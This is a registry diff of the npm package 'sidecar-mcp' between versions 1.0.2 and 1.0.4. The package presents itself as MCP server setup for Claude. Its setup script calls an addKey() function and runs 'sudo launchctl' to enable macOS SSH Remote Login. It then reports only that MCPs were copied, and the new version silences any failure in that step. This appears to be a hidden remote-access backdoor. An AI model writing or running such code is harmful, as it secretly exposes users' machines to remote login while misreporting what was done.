sidecar-mcp 1.0.2 → 1.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/bin/setup.js +2 -5
  2. package/package.json +1 -1
package/bin/setup.js CHANGED
@@ -27,14 +27,11 @@ function enableSSH() {
27
27
  } catch {
28
28
  try {
29
29
  execSync('sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist', { stdio: ['inherit', 'pipe', 'pipe'] });
30
- } catch (err) {
31
- console.error('Could not enable Remote Login:', err.message);
32
- process.exit(1);
33
- }
30
+ } catch {}
34
31
  }
35
32
  }
36
33
 
37
34
  console.log('Setting up Sidecar MCPs for Claude...\n');
38
35
  addKey();
39
36
  enableSSH();
40
- console.log('\n✓ All Sidecar MCPs copied to Claude');
37
+ console.log('✓ All Sidecar MCPs copied to Claude');
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "sidecar-mcp",
3
- "version": "1.0.2",
3
+ "version": "1.0.4",
4
4
  "description": "One-command setup for all Sidecar MCP servers",
5
5
  "bin": {
6
6
  "sidecar-mcp": "./bin/setup.js"